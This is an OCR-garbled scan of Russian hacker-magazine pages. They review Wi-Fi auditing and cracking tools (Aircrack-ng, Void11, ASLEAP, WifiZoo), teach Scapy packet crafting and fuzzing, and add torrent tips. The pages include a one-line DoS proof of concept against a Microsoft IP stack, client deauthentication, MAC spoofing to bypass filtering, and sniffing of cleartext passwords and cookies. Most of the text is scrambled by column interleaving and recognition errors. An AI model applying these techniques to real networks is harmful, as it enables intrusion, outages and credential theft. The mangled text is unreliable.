меняет пассивное сканирование [ничего
граммировании толком никогда и не слыwа не вещая в зфирl. Причем используемые Сам набор состоит из нескольких утилит
""~I!-!!!'""" ли. При этом Vistumbler не просто работает. а методики позволяют оп ределить некоторую и включает alrodump Icнифер для сетей
работает отменно, отображая помимо уровня информацию о клиентах. подключенных 802.11!, alreplay Iтулза для инжекции Wi-Fi
сигнала МАС-адрес вендора, используемую к сети, а также найти скрытые (поп фреймов), аiгсгасk [взлом WEP и брутфорс
систему шифрования и прочие пара метры ЬеаСОПlпgl сети, правда. только В том слу WPA- PSKJ. а также alrdecap [декодирова
Данные о расположении Ha~дeHHЫX точек чае если в них есть некоторая активность. ние перехваченных WEP/WPA файлов). В
можно «на лету» экспортировать в KML Kismet автоматическим может определить общем случае для взлома WEP необходимоr!!I:=;
формат и EJ реальном BpeMeHtoI отсnежtolвать используемыедtolапазоны IP-аАресов. пере определенное количество перехвачен
их появления на карте через Google Eaгth. хватывая ТСР. UDP. ARP и DНСР пакеты, ных пакетов: как только будет захвачено
Для Bapдpa~BepOB полезно~ также окажется дампить трафик в формат для Wlreshark/ нужное количество фреймов, aircrack- пg
функция, с пщющью KOTOPO~ уровень сигнала TCPDump и даже определять примерное будет готова провести статическую атаку
обозначается с помощью различных звуковых расстояние до точки доступа (работа с GPS, на WЕР-ключ Сейчас Аlгсгасk-пg поддер
фа~ЛО8. Справедливости ради стоит сказать, рдзумеется, поддержи ваеТС51 J. живает три способа для «восстаН08ления»
что в Netstumbler'e та:<же можно было про Примечательно, что после более чем 5 лет ключа
вернуть подобны~ трюк, но лtolwь при помощи разработки, создатели вот-вот порадуют нас • первый метод через PTW-аl'аку: основное
внешних скриптов совершенно HOBЫ~~ релизом. В частности, nреимущество заключается внебольшом
в конце мая вышла KIsmet-2009-05-RС1, в количестве перехваченных пакетов, необ
inSSlDer которой был кардинально переработан интер ходимых для взлома WЕР-ключа Но метод
www.metageek.net/ фейс [по-прежнему используется псuгsеl, работает только с агр-пакетами, и это. есте
products/inssider ствен но. большой недостаток,
PaccтpoeHHЫ~ тем фактом, что Netstumbler • второй вариант - через FMS / КогеК атаки.
не развивался несколько лет и не работает с Метод включает в себя различные статиче
Вистой и даже 64-битной хр, Charles Рulпеу ские воздействия [FMS, КогеК, Вгutе [огсе)
решил написать свою собственную утилиту ДЛЯ поиска WЕР-ключа и требует больше
для поиска Wi-Fi ceTe~. после чего опу пакетов. чем в случае РТW-дтаки;
The Code ProJect. Идею подхватил Norman для ви нды, ТО он есть, но реал изо ва н компа • трети~ вариант - подбор с использовани
Rаsmussеп, после чего на свет появилась нией САСЕ и, увы, работает только со специ ем словаря (word [1st), используется, в основ
новая версия IпSSlDег'а. построенная на альны~~и WI-FI адаптерами Сасе AirPcap. ном, для взлома WPA!WPA2 ключе~.
базе Natlve WI-FI API Инса~дер подобно Полноценная версия Аlгсгасk-пg суще
Netstumbler использует активные методы Aircгack-ng ствует только для Linux, хотя на офици
сканирования, а всю на~денную о точках aircrack-ng.org альном сайте доступна "недоверсия» для
доступа информацию отображает в табличке, Alrcrack-ng - полноценный программ винды. Разработчики честно предупре
сдабривая данные красивыми графиками ный компле кс для взлома 802.11 WEP ждают, что для ее работы нужно самому
уровня сигнала. Тута очень простая - ниче IWlred Equivalent PrivacyJ ЕпсгурtlOП и доработать DLL конкретно для своего
го лишнего, но я нередко использую именно WPA/WPA2-PSK ключей для WIFi-сетеЙ. WI-Fi адаптера.
----'~,
'Р_=
,.,.....
~~.-~i"o--·l
__0_ _1
H<!IldYI!le 10. _.. pci\'1en_lXffif.deY_l00t
Cat6;1uIoI.ionlD . .{FZ..зо6ЖВ·"21·ФОС·~.ВFВ3(FlD3ЭЕО}
МдC.Addl~n, ... ос).(:м;.sз.24~в.зз(Chщ;led)
cr..coS)tJI~lnc. [oo-cG-53)
l"easeObl.ained . .5I2312OO912:5a.2GAМ
~=r=~1
TCPJlP . .En~d le.5ieE~es . .. &I6I2OOЭ 125а26АМ jJ
Qit.1Ыe I ~МAC I Di:М1eOHee! Re!t,)08IP I
ло программ, в том числе платная 5МАС [VJWlN.klссопsultiпg, помочь снифер, который должен nоказать пакеты
пеt/sпо~сJ и бесплатная ТесhПltlum Обе требуют лишь REQUE5T, EAP-CISCO Wlreless [LEAP) Главная особен
выбрать ceTe80~1 адаптер и указать для него желае,4ЫЙ ность LEAP состоит в том, что для авторизации нужен не
МАС-адрес, Убедись, что адрес успешно сменился (команда только пароль, но и имя пользователя' По умолчанию в
~ dvd iрсопflg /all в консоле) и попробуй установить соединение, Windows этот протокол не поддерживается, поэтому для
Упомянутые в статье К сожалению, с первого раза ты можешь легко обломаться, работы потребуется установить специальный клие~т
утилиты и x-tооlZ'bI поскольку овторизированныйклиент может быть уже под Аiгопе( Сllепt Utillties \llttр:l/гогsсhасh.СОПСОI'diа,r;а/пеgi
необязательнокачать ключен « сети, Выселить его олуда поможет все та же про гепооtе ассеSS/'о'.'iгеlеss/gепегаl info/acu.html]. А есть ли
из инета они будут грамма Voidl и деаутеН'Гифационныепакеты. смысл его устанавливать? Конечноl Несмотря на npo
на DVD-диске думаннооь протокола, даже в нем обнаружили уязвимо
http://wi relessd efen се.О rg/Contents/ перехваченных пакетов LЕАР-авторизации. Первым это
Void11Main.htm пронюхал Joshua Wrrght - разработчик утилиты ASLEAP
Voidl1 используется для деаутентификации беспроводных [httр:Uаslеао.sоuгсеfог е r.\~\I, Эта утилита перехваты
клиентов от точки доступа, или. проще говоря, для при вает сетевые пакеты при повторном коннекте клиента,
нудитель~IOГО отключения клиентов отточки ДОСlупа После после чего брутит пароли для идентификации.Утилита
такого отключения беспроводной клиент будет автомати работает нативно под LIПUХ'о,~, однако на официально,~
чески пыттьсI1 подключиться к точке доступа (повторить сайте есть версия программы И под винду !правда, не
ассоциацию). А при каждом повторном подключении будет самого последнего билда]
создаваться трафик, который нужен для подбора ключа, К
~ links тому же. можно отключить клиента, занять его МАС-адрес WIFIZOO
Дистри5утщ!ыдля и таким образом обойти фильтрацию по MAC-aдpeca~~, К Раз воспользовавшисьутилитой Wif,ZOO, понимаешь,
wагdгiVlпg'а сожален и 10, средства Windows это не позволяют. зато фокус насколько просто перехватывается различная инфор
Slitaz Аlrсгасk-пg легко реализуе~~ под никсами С помощью этой утилиты: мация в открытых WI-F, сетях, Сама задача утилиты
DistпЬutiоn: - пассивно собирать различную информацию из сети,
htt Р :LL2.I.r::~ г.;э с1.:. voidllJ)enetration ··5 КЛИЕНТСКИЙ_~f.'\С -8 Написанная на Руthоп'е (8 основе, кстати rOBOpl1, лежит
ОЛJ Если в ходе сканирования твой стамблер в колонке па [5510], но и информациР. об использующих их клиентах
~WlrelessKeyView ,:
Eile ~dit ~iew !::lelp
0ОI122ЗЗ445566778899ааЬЬссddееff()()" •
4е69725З6F66657231 З2333435 NirSofer 12345
ний), а таюке [и это самое вкусное) самая токолов (сейчас поддерживается более 701. i.~,. .._c ....... 8« ... Id......
!i I)~ct: 'H. _
разная инфа, передаваемая В открытом виде Более того - можно полностью воссоздать
~ _.~,
по сети: пароли для незащищенных прото ТСР-сессию и ПОClo10треть, к примеру, НТТР I~~~ОО1»~~~.u;-~")r,"~ оо...'(Х,,"а,оо..:о:.11d5t )О.хх.ю:ili.1:ХХ,ю:
ТСI':Ы.1».а".е.)JЮ~
..
ln.I6&.1.2....4m)
I ... Q<.n:lt",::.<II(;<>(/~""_~<1,,,,,It<I'!O!r;1A'IJ·\luwaLl
...
колов [pop3!ftp!te lпесl, почтовы й трафи к, htcp трафик со всеlo1И запросами и соответствен 1:-- __
J ~~~QO~{-~0?'~='S'Sl'C .. ОО-_'О:сХХ:3<II,хх,хх<!woОО>Jt.'(:.\Ххх,де.7
кукисы и данные для авторизации, и т,д но интересной инфой, вроде данных для 1~~:i~i~~~~,>I':fl.Lt>'J.1.24 ..tvr'.з
Единственный недостаток WifiZoo заключа авторизации. Весь перехваченный трафик
1
~~Q.о~~~..жI~Dw~'.W'.:.:...:tb:>AJt.:!.IюшпL'tb.L4~dd'N
i'<tIb-Jt:\.I.Il
ется в отсутствии режима Channel hорр,пg. может быть сохранен в файл для последую
8 результате прога може'г прослушивать бес щего анализа. что особенно радует - это
1-kl91"~">
ЧЕННЫЕ С ПОМОЩЬЮWIFIZОО
QIoOdO",6In.:4-'I ,_11II.: tl'/(II1~","II:51J
'''~
AV'""~rj>te<! 1'JZlII
.~ 1'Io:><...... Io=00± ~IIXЦ •
процессора, WSA использует техноло
~2'"~
...""~ ,..,:;==---=---,_,
..... гию, которая в процессе восстановле
, Sti:!
0rbJ< Ot:t!I:i A~.
Ow.;"
С!rщ. , ния ключа задействует графические
акселераторы. Тут надо сказать, что
1, сама програМlo1а не перехватыеает тра
СПЕЦИАЛЬНАЯВЕРСИЯСНИФЕРА
.,~~--=~=·E=~:·~·,.,:,,". .~~
?!
;:~:~::~~= ~~'~2mJOO.r'L2GRJ<:8~']
фик иэ беспроводной се'ГИ, а имеет дело
только с дампом сетевых сообщений
[поддерживаются форматы TCPOUMP,
'::-:---------~._-----~:;,.:..
COMMVIEW ДЛЯ РАБОТЫ В БЕС ПО ЗАЯВЛЕНИЮ РАЗРАБОТЧИ
CommView. PSPR). Т.е работает в связ
ПРОВОДНЫХ СЕТЯХ ке со снифером. Важно, что для уско
КОВ, СКОРОСТЬ ПОДБОРА WPA
КЛЮЧАМОЖЕТВОЗРАСТИ В рения вычислений подойдет вовсе не
компенсируется предварительнозапущенным РАЗЫ, ЕСЛИ ИСПОЛЬЗОВАТЬ любая карта, а только топовые модели
для большего удобства в комплекте идет предупреждения поэволяют сообщать поль ции пароля Iнапри,~ер, слово password
GUI-интерфейс, реалv.зованныЙ в виде веб зователю о важных событиях, таких как подо за,~еняет на plassword и т.д.)
сервера, который по Уlo10лчанию поднимается зрительные пакеты, высокая загрузка сети
~1~~~i~~~fY~~~tlц t il sl
на 127.0.0 1:8000. или неизвестные адреса. Словом, вам отлич
~Iая программа для винды за исключением
мацию от беспроводногосетевого адаптера позволяет проверить надежность (да, WlrelessKeyView. которая ebITacKVlBaeT
и сразу декодирует анализируемыеданные, теперь ато так называется' .JI WPA! из реестра сохраненные в системе WEP!
отображая их G удобном для переваривания WPA2, но используя современные Io1ETO WPA ключи, Приятно, что WlrelessKeyVlew
виде. В случае необходимости, пакеты можно ДИКVI для вычислений С помощью гра работает как с сервисом Wlreless Zero
дешифровать с использованием пользова фических процессоров. В дополнение к Conflguration в W,nXP, так и WLAN
тельских ключей WEP или WPA-PSK и деко режиму, когда восстановление ПрОИЗEiО AuloConflg, KOTOPЫ'~ пользуются юзеры
дировать вплоть до самого низкого уровня дится средствами только центрального Висты. I
5[АРУ J х
х 5[АРУ
xEEi8
СТЕПАН «ST~» И~,~~Н
~АБОТА
ХEEi8 х
J
еоеКАЛЬПЕЛЕМ
РАЗБИРАЕМСЯСУТИЛИТОЙSСАРУ
настоль толково, что вкупе с используемым Python'a. Необыч",ый подход сначала может прога изнзчально написана для никсов, и под
интерпретатором Python, можно выполнять смутить, но когда разберешься с простым тем же Llnux'oM запустится с пол пинка, а вот
ряд самых разнообразных задач: начиная от синтаксисо,~ и осознаешь, 4ТО к твои,~ для ИСПОЛЬЗ0ва",ия виндового порта придется
банального сканирования портов и закаН4И услугам предоставляется еще и вся мощь чУ1Ъ попыхтеть.
вая сложными приема ми для определения Python'a, вдруг понимаешь' «А еедь удобно, Первое, что потребуется, - это устаНОЕлен
инфраструктуры сети. В итоге получаем черт подери l И как это другие до этого не ный в системе интерпретатор Python. Тут не
одну еди нствен ную утил иту, которая может додумалисы >.. надо спешить и ска4ивать самый последний
заменить такие известные тулзы, как nmap, релиз. Во-первых, Scapy написан на второй
arpspoof, arp-sk, агрiпg, tcpdump, tethereal, СОВЛАДАЙ С ВИНДОЙ!
ветке Рythоп'а, а поэтому можно даже не про
pOf. И бол ее того - готова подстроиться под Чтобы не грузить тебя теорией, предлагаю
бовать запускать ее на последнем З.х билде. А.
са м ые спеЦИфИ4еские ситуаци и. сразу взять быка за pora и разбираться с про
во-вторых, для корретной работы програм,~ы
Вообще, Scapy сильно ОТЛИ4ается от многих граммой на конкретных при мерах С",ачала мы
придется установить несколько дополнитель
других утилит Она работает в текстовом разбере,~ся, как просто составлять и отправ
ных модулей. некоторые из которых имеют
окружении, однако взаимодействие с поль л\пь пакеты в сеть, а потом посмотрим на реа портированн ые версии только для 2.5 релиза.
S[RPY
По сути, это интерпретатор Руthоп, сдобренный сама Scapy. Причем зна4ения по умолча
специальными функциями Scapy. Можешь вве нию не отображаются пользователю далее,
сти команду l5[]. после 4его оБОЛ04ка должна когда он просит интерпретатор вывести его
вернуть список протоколов, с которыми она под пара метры. Посмотреть значение нужного
проблем, рекомендую тебе следующий наБОР4ИК мать. что данные с запросом ONS сна4ала одного или нескольких полей, мы очень
[весь он, само собой. есть на нашем DVD), инкапсулируются внутрь UOP-пакета (потому просто получаем ГОТ08ЫЙ фаэзер [о фаззинге
• Собственно сам Scapy для винды; как протокол DN5 используетдля передачи поговорим нижеl! В конце КОНЦО8, никто не
• Pytnon 2.5Iw'NW.python.org); данных UDP). далее уже UDP-пакет инкапсу заставляет создавать Ку4у переменных для
• расш и рения интерпретатора PYWI п32 лируеТС51 внутрь IР-пакета, и в конце концов каждых слоев, все можно уместить 8 рамках
I tnОП.пеl crew mllammond v"iп32], зта сборная солянка размещается внутри одной строки:
» pc_zone
IEthenIot11
I~~
'УР<
(]в
vt!1~ioo
.101
х ,,,".,.
~ warning ""
1D,t
,,'
,..to
При всем функцио
нале, надо признать,
..,
<:Ilbufll
Of)t1o:.s
klrlJl.l1
TRACEROUTE'A
Скорость передачи "'"
пакетов В 6 Мбит/с ВИЗУАЛИАЗАЦИЯIlЕРЕХВАЧЕННЫХ
- пожалуй, верхний ДАННЫХСТАНОВИТСЯДОСТУПНОЙПО(Л~ всем возможным и интересным для нас назначеНИАМ.
СТвом па кетов может ПОСЛЕДОВАТЕЛЬНОСТИПДКЕТОВ лять пакеты на удаленный IP-аАрес по ICMP, ТСР или
потребоваться много Ровно как и обычный пакет, несложно создать и после ARP, получаем соответственно ТСР-J'ИНГ,
памяти, довательности пакетов. За примером использования IСМР-пинг и АRР-пинг. А если сканировать значеНИА
далеко ходить не нужно, ведь создав последовательность TTL, то получаем утилиту traceroute. Словом, можно
ТСР-пакетов на различные порты, МЫ получаем ГОТОВЫй сделать очень многое, и все завиоп от твоего вооб
С помощью де САТИ созданных IСМР-пакетов мы простым Тут надо сказать, что на практике гораздо чаще встре
Пингом сканируем первых деСАТЬ адресов каждой из под чаются ситуации, когда нужно не только отправить
egin eAi~sion:
ответами: читаемой форме.
Fini~)led to ~end 256 pac)(ets.
Begin ClТli~Gion:.
.. *.* " .
. .. print stг(s[ТСР).dроrt) + "
•••••••••••••••••• .м-.
Receiucd 260 packet::;:, got 4: an~H'Cl'S, I'cnaining 252 is unflltered" в Scapy есть уже реализованная функция
»> ans.sttMJ!lёl.1"y(lan1:H:\a ($,1'): 1'.spl'intf(";;:EtJIC1'.$l'
@@,5@,56,cO,OO,OS 192.168.56.1 arpingll, которая реализует тже самое В каче
~
00'50'56'.h'f?'?a 192.168.56.2
ОО,Ос ,29 'd6 ,91 ,о. 192.168.56.128 Если ответ не получен, вероятно, порт стве параметра ей необходимо лишь указать
00'50'56 '.7'Ьа'67 192.168.56.254
>>> закрыт Поэтому просто отображаем на сегмент сети: arplng[,,192.168·1 '»1 Другой ~'\'Y
РЕЗУЛЬТАТ ТОЛЬКО ЧТО СОЗДАН экран номера портов иЗ запросов, на кото вариант найти апивные хосты В сети v"
НОЙ ARP PING'A рые ответа не последовало: банаЛЬfiО nрОП!Анговать каждый узел в задан
print str(s['1'CP]
unans:
.dроп) + "
ном диапазоне, что легко выполняетс\! коман
/'
802.3. есть фуfiКЦИЯ sгрl] is filtered" »'>
ans.unans=sr(IP(dst="192.168.1.]
уже говорили Давай посмотрим теперь, как уже готовая утилита arpingl. Напомню. что r.sprintf("%IP.src% is alive")
Допол"н'ител bHble
попробовать использовать различные ТСР
Рiпg·и, например, с помощью ТСР SYN:
IP(dst="192.168.1.*")/
=зу- .~".
::".-" ~--:
~>IТ »> p=IP{) ПСМР() Любой ответ будет означать, что узел активен.
»> p·;pdfdump (<<test.pdf»)
." АRР-СПУФИНГ
-:М: процесс передачи IIaKeTOB можно отобразить и в виде 3D-диаграммы. для этого потребуется Не составит труда и использовать клас
--'" , -_..- _.~., 't...-.' '=,.-...... _'.. . Т' о которым мы вспоминали букваЛЬfiО в
»> а, u=traceroute ( [«www.python.org».«google .. com» ,»slashdot ·.oi-'g»"1 У' .~. предыдущем номере, в статье "Вскрываем
у ScapyHeT встроенных функций для опред~ения типа ОС на удаленном хосте, но зато есть стве шлюза использовать совершеfifiО дру
возможность использовать всю мощь утилИ"Г Nrnap и Queso (их предварительно нужно уста гой узел - где мы легко можем установить
inter=RandNum(10,40). lоор=l )
----7 : о
[]равка
- 18!i3
ПQ.'1СК ~A 1SOдировки ~ННT8К(HC Оny,НН
@
1
00 [Е ~ Ii 1<§\ d l::J '~
,(Е X/i._06J'C20NЕ_RA80ТАЕ"1...SQ_St:.(lЦ'j;фJ.!Ш IIIE 08'6' 2 ~ .,ping.py
.ч! IlJsr/bln/env p,/1hOn
DB = ()
5carpwatch_callback(pkt):
i:f АЙР in pkt.:
1О
else:
t-e.rqet pkt (:fther) .dзt
~
12 te.rget =- "~:$?" 'ъ p,kt.[ARP] .pd~t
1Б
16
17
18
19
20
i else:
DB[ip]~mac
eli:f' IP in pkt.:
S1p,d1p = pl<t[IP] ."rc, plc~(IP] .dB~
i:f 5ip not in 1>В Ot.' d1p not :in DБ:
~ (Rl8c,ip)
21 ret.urn
22 1:f :E.t.hec in pk't:
23 зmаС/~ас = рk~[Еt.hеr].эrс, рkt(Еthеr].dЭ~
24 eJ.i:f Do~l1in р)сС:
25 рll = p!l:t.[Dool1]
х чения 1,2,3. то можно послать 5 - и отследить реакцию. 0001 Ether / IP / ICMP 192,168.5.21 echo
Как среагирует на такую подставу демон? А как клиент? В rcquest О / Raw
при~щипе некорректные значения можно f'lодставлять и
IЗручную, однако для большего удобства в Scapy реализо Обрати внимание, что отправку па кетоlЗ и снифинг можно
вана функция fuzz[), которая преобразует любой коррект, провести всего один раз, а отваты и резупьтат снифинга
ный пакет в пакет, специально заточенный для фаззинга. присвоить переменной, после чего делать с кей все что
~ links Фишка в том, что функция автоматически заменяет все угодно. Столысо раз - сколько потребуется. Получаем
• в е рсия SCQ ру для поля [кроме случаев. когда значение поля должно быть I~ИНИМУМ активности, которая кас может спалить, и макси
IPv6:1.1..9.-n:blpiiru. подсчитано - например, поля с КО~IТРОЛЬНЫМИ суммамиl мум возможностей по интерпретации 8 нашем примере
hrшgо.widе.аd.jр/ случайными значеliИЯМИ, но подходящими по размеру перехваченные пакеты мы помещаем в массив а, и теперь
~ для этого поля, Разберем при мер: можем обратиться к пюбому па кету, просто указа в его
индекс к примеру, а[1]. Метод пsummагу[l, как видишь,
• Uпit-тестирование »> send (IP (dst=" target") / fuzz (UDP () / выводит общую характеристику перехваченных пакетов.
для Scapy: secdev.org! N'ГР ("ersj.on=4) ) , 100р=1) Перехваченные данные в некоторых случаях удоб
RIQj.~_c;ts!UTsca ру. нее просмаТРИВдТЬ и анализировать в удоБНОl4 GUI
в этом случае IР-слой будет самым обычным, в то время как дЛЯ интерфейсе того же Wireshark·a. Для этого перехвачен
• Инжектирование UOP и NTP [это, кстати говоря, протокол сетевой синхронизации ные пакеты рекомендую сохранить в файл в формате
паl<етов в Wifi: времениl будет использовать фаззинг. Причеl~ контрольная РСАР: wrpcap(<<temp,cap»,pkts). Обратное действие осу
sid .rstack.org!indg~ сумма в UDР'пакете будет корректной, в Кдчестве порта будет ществляется так. pkts = rdpcapl«lemp.cap»I.
®..QLw.ilitQQ EN. использоваться порт 123 [стандартный дЛЯ NTPI, а версия NTP
будет установлена на 4 [Т.к. она явно задана при соэдании паке РАЗ ПЛЮНУТЫ
та!. Остальные поля будут заполнены случайными значениями. Самая главная фишка Scapy в том. что она позволяет
обойтись без написакия новой утилиты. Если для напи
СНИФИН:Г сания Proof of еопсерt для DoS'a MicrosOft'OBCKOro стека
Не даром мы устанавливалиWiпРсар и модуль для работы IP требовалось 115 строчек на С, то в Scapy это можно
с ним: В Seapy реализованы отличные возможности для реализовать всего лишь одной строкой:
снифинга данных. Основная функция - snift 1], в качестве
параметров которой можно указать интерфейс для про send(IP(dst="target",options="\x02\
слушки, задать фильтр и количество па кетов для перехва х27 " +" Х" * 3 8) /ТС1? () )
та. Если интерфейс не указан, снифинг производится по
всем интерфейсам сразу. Вот так просто fЮЖНО перехва С помощью Scapy реально сотворить все, что угодно Хочешь
тить IСМР-трафик, связанный с ХОСТOI166.35 250.151: сканер портов с нужной тебе логикой - легко добавить
возможность flпgегргiпt'а? Раз плюнуть. А впрочем, почему
»> sniff(filcer="i.cmp апd hosc использовать его только для пентеста? Перехватывая и обра
66.35.250.151", соuщ=2)
батывая пакеты, можно легко сварганить уникальную IDS
<Sпiffеd: UDP:O ТСР:О ICMP:2 Other:O>
систему с триггераl1И на любые события. И самое главное
»> а=
сделать это очень просто. Скажу больше - никто не обязыва
»> a.nsummary()
ет тебя постоянно работать череэ интерпретатор. Seapy очень
0000 Ether / IP / ICMP 192.168.5,21 echo
просто подключить к своему Pythоп-сценарию как модуль и
requesC О / Raw
использовать все ее возможносги на всю катушку! I
в каЖДОМ номере
DУD с полнометражным
фильмоМ
. www.totaldvd.ru
ДЕСЯТОК CEKPE~OB : о КОТОРЫХ ТЫ НЕ ЗНАЛ
ками с мобилы, получить аккаунты на приватных потрафикуу хостера. Дома ничто не мешает нажать на кнопку «Download torrent" и далее вы
трекерах и автоматически скачивать свежие воспользоваться любимым клиентом (напри брать папку для сохранения файла на локальном .
дистрибутивы программ. Вот эти м и зай~~емся I мер, uTorгentl, но сам лично не раз стал кивался диске. В большинстве случаев, началозакачки
с ситуацией, mгда файл кровь из носа нужно не заставит себя долго ждать. Секрет работы
ОБХОДИМСЯ БЕЗ КЛИЕНТА было скачать из совершенно левого места. Как сайта в специальном Jаvа-апплете, который и
Все чаще начинаю замечать. что некоторые вариант, на машине можноустановить порти выполняетфункции Тоггепt-кгиента Но отсюда
эксклюзивные вещи становится возможн ым руемый кгиент. которых большинство, но есть же возникает и единственноетребование. необ
-. =--
._0 ~
--
,..
." -::;. -:'..
...
-:='";;;;;;;';
-
ю,.
:. .. . . изтор
РЕНТОВ ПРЯМО ЧЕРЕЗ ЛЮБОЙ
~;...,:..-
ВРДУЗЕ::Р
1:'::
1-
;
г----------------------il 'l !
ходи~ю позаботиться,чтобыдnятвоего браузера
РЕГИСТРИРУЕМСЯНА
ЗАКРЫТЫХТРЕКЕРАХ
••
ВАИТ НА ЗАКРЫТЫЕ TPEKEPbl
ТВОЙ ИН
закрытых торрент-трекерах нужны инваЙты. Имея не очень широкий канал, мне удобнее
где эти инвайты взять, еслv.друзья о таких регистрироваться Кстати говоря, дпя обмена дома Поэтому зачастую управпять закачка
сервисахдажене СllышаllИ На самом деllе, инвайтами есть даже специаllизированный ми приходитсяудаllенно. Конечно, ничто не
попностью приватнытреJсерыы- большая ресурс - wwvueroRaid.com. ограничивает в ИСПОllьзовании обычного
редкость. Многие изтаких вот закрытых R РD-клиента, но 1уТ ты опять оказыва ешься
трекеров открывают свободную регистрацию в РАБОТАЕМ БЕЗ ТРЕКЕРА привязанным к компьютеру. К счастью, есть
опредеllенные дни недеllИ v.ли даже оnреде Увы. но трекерызачастую оказываются недо способ вообще избавиться от каких-либо
пенные часы. Уследить за этим довольно ступными. Крупных и извеСТНЫХТр9.сутправо ограничений, установив для своего клиента
тяжело, муторно - в КОl1це концов, не наш этот обладатели, неБОЛЬUJие и при ватные банально веб-интерфейс Одним из самых распростра
метод вручную заходить на сайт 8 надежде, оказываются недоступ ными из-за проблем с ненных вариантов является связка нашего лю
что вот-воттам откроется регистрация. Не хостингом. Сам протокол BitTorrent подразумевает бимого uTorrent и специально разработанного
буду говорить по поводу того, ЧТО можно на обязатеllьноеучастиетрекера, но клиенты разви веб-интерфейсаWebUI [htl[J//lогum.Ulоггепt.
писать простенький скрипт. КОТОрЫЙ сам все ваются настолько быстро, чmуже сами придумали com/vie\'IIforum.ph[J?id=20J. ДIlЯ установки надо
автоматически будет проверять Но нескажу дополнения для протокола. Так что Кilиенты могут лишь распаковать архив с ПОСllедней версией
лишь потому, что уже давно сделали за нас работать вообще без трекера. Если в опциях WebUI прямо в папку u Тоггепt'а и далее ВКIlЮ
создатели сервисов Trackerchecker.org и программы естьуказание на DНТ -считай, так чить ero в настройках. После того, какактиви
\Nvvw.o[Jentrackers.lr. Первый очень простой: оно и есть. DНТ [DistribuLed Hash ТаЫе. распре руешь веб-клиент соответствующей галочкой,
скорее всего, какой-то rv.K ero сделаll для себя, деленная хэш-табllицаJ работаетдnя разных тебе предложат ввести логин v. парольдля
а после OTKpbIll для всех желающих. Совсе" р2р-технологий, но конкретно Кilиентам 8itТоггепt ДОС1упа, сделать гостевую учетку, а также за
другое дело - opentrackers. Тутты не только позволяет обойтись вообще без трекера. Ины"и дать порт, на котором клиент будет принимать
можешь узнать о состоянии регистрации словами, Кilиент сможет найти nИРОВ,даже если подключения Вот, собственно, и все: теперь,
нужныхтебетрекеров[а заодно и открытьдля трекер отключен или даже никогда не существо чтобы обратиться к веб-интерфейсу, доста
себя кучу новых], но и посмотретьконкретную аал. Кроме топа, l'Oрренты можно размещать без точно набрать в адресной строке httр//<твой
статистv.купо каждомуv.з них, А чтобы не про трекера. Утакого развития Кilиентов есть и ложка 'р>.<указанныЙ в настройках порт>/gUI/
пустить «счастлv.выечасы", тебе предлагается дегтя. в виду отсутствия стандарта нет единого Неважно, откуда ты будеwь попьзовать веб
подписаться на общий для всехтрекеров понятия 01"ОМ, какдолжна выглядеть таблица v.нтерфеЙсо", неважно какой браузер будет
RSS-фид,либо на фид по KOHKpeTHO'~yресурсу DНТ В результате, в нашем любимом ~Тогneпl ис использоваться - управлять закачками ты
Если присмотреться,то рядом с наиболее по пользуется та же реализацv.я DНТ. что и в МаiП\lпе можешь хоть через мобv.льныl~ браузер теле
пулярнымитрекерами есть небольшая иконка и BIIComet, но, увы, несовмесгимая с Azureus. В фона [npoBepeHo на Opera Мiпil Не эабудь
[например,у Demonoid'a v.IlИ f'ileList orq), по любом случае, поддержкуDНТ в своем Кilиенте пробросИ1"Ь порты, если используешь маршру
которой можно перейти на сайты для обмена необходи~ю ВКilючить в обюательном порядке. тизатор и разрешить входящие подключения
приглаUJеНИ>lМИ Обычно эти IlИНКИ ведут на для нужного порта в фаЙрволе. Для большего
ветки каких-то форумов, поэтому для запроса УДАЛЕН НО УПРАВЛЯ'Е~М удобства реко,~ендую обзавестись записью
приглашения придется предварительноза- ЗАКАЧКАМИ ЧЕРЕЗ ВЕБ в каком-нибудь DупDNS-сервисе (например,
dуПdпs.соm], чтобы вместо своего IP вводить
что-то mоilоггепt.d пdПS.соm.
~~...
5:..\3.
$'StfII.
СЭIOOJl
;:::
~-~-.~~~:-~~-.~~~.;,,..,s.
.
•
•
~
~
~
~.:: ~~~ ;:-~)~ ::~
l.~JGI)
~т.!CZ;
::6..~~~1S
~A'"
m.~,.
:O:n~.,.
= .. !'!А --~;;,;-___;:;:..-
))(~~ :-6~;
'
~ warning
Несиотрянадурную
. '
славу,
-
BitTorrent
это лl-tшь распре
обмена Файламl-t_
URЕМОТЕПОЗВОЛЯЕТУ~АЛЕННQУПРАВ
Но надо ПОНИ'1аТЬ,
ПЯТЬ • •
что, l-tспользуя его
• •• •
для загрузки вареза
Автор и реда кцl-tя самых фидов Особенно часто 8стречаются RSS-фиды с еже
зто НИ В KOef1 случае недельнымl-tтелевизионными программами l-tли сериалами,
не поощряют. Тгапsmlssiоп (httр:!IWVffl.tгапsmissiопЫ.соrn].ТОдЛянего закачкукоторых как раз и хочется автоматизи ровать. Лезть на
разработа н не менее впечатляющий веб-l-tнтерфейс CILJtch сайт за каждой новой серией тупо леl-1Ь, Зато подпl-tсаться на
(httr !/cod e,I'ecLJrsel'.com!wiki/clLJtchiAboLJt!. Семимильн ы ми нужный RSS-фl-tд через торрент-клиентне сложнее, чем просто
€)
~ dvd
ша га м l-t развивается кросс-платформенная ПРОГРЫ1ма
Ideluge-tоггепt.огgJ, у которой также есть подобная опция. Тут
надо отдать должное разработчикам, создавшим открытую
систему - и без того широкl-tе возможности клl-tента можно
1
БУДЕтдоеТУПНАUТОRRЕNТТОЛЬКОГЛУБОКОЙНОЧЬЮ автоматизация: мы напрямую зависим отех, кто соэдает
jг
r- UI settings знакомый инструментУаhоо Pipes [pipes,yar,oo.cQm], Этот
!-·DitectQries
o Еn.ы. S<:h.dul.,. замечательный сервис позволяет обрабатывать раэличные
, 1·- Connection
Schedulerl'O!IbIe
I 1·- Вand",dth источнl-tкl-t данных [RSS-фиды, любые HTML-страl-JичкиJ,
~ 8itTorтent"
фильтровать полученный контент, выделять из него нужные
!." QUfue:ing I
~Scneduler I данные и получившийся поток информациl-t оформить 8
;-.. \~,reb ur I виде обычного RSS-фида. А поскольку настройка «водо
I (~- Adv.nced I провода» выполняется с помощью графl-tческого l-tнтер
фейса, то можно очень быстро сварганить готовую подписку
I DTumoff
с совершенно любой l-tнформацией, в том чl-tсле И ссылка'1И
на интересующие тебя торренты. То, откуда ты l-tХ будешь
[;JLimit~ О Seeding only
брать и по KaKO~~y Прl-tнципу отбирать, зависиттолько от
S<hedul ... S<ttings тебя. Ч-roбы быстрее BHl-tКНУТЬ в водопроводные дела, реко
